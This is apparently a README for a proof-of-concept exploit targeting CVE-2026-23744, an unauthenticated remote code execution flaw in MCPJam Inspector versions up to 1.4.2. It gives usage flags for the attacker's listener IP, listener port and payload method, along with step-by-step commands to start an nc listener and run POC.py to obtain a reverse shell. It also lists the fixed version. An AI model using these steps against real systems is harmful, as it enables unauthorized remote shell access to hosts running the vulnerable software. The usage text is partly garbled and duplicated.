Share
## https://sploitus.com/exploit?id=254A6F19-4F33-5786-90FC-3146F3468F08
# CVE-2026-23744 โ€” MCPJam Inspector Unauthenticated RCE

![Python](https://img.shields.io/badge/python-3.x-blue) ![CVE](https://img.shields.io/badge/CVE-2026--23744-critical) ![Platform](https://img.shields.io/badge/platform-linux-lightgrey)

MCPJam Inspector  -i  -p  [-m ]
```

| Flag | Description | Default |
|------|-------------|---------|
| `-u` | Target URL | required |
| `-i` | Your listener IP (LHOST) | required |
| `-p` | Your listener port (LPORT) | required |
| `-m` | Payload method: `busybox`, `bash`, `python3` | `busybox` |

---

## Reverse Shell Example

**Step 1 โ€” Start your listener:**
```bash
nc -lvnp 443
```

**Step 2 โ€” Run the exploit:**
```bash
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
```

---

## Payload Methods

If `busybox` doesn't work on the target, try the other methods:

```bash
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
```

---

## Affected Versions

| Software | Vulnerable | Fixed |
|----------|------------|-------|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |

---

## References

- [CrowdSec CVE Tracker โ€” CVE-2026-23744](https://tracker.crowdsec.net/cves/CVE-2026-23744)
- [MCPJam Inspector GitHub](https://github.com/MCPJam/inspector)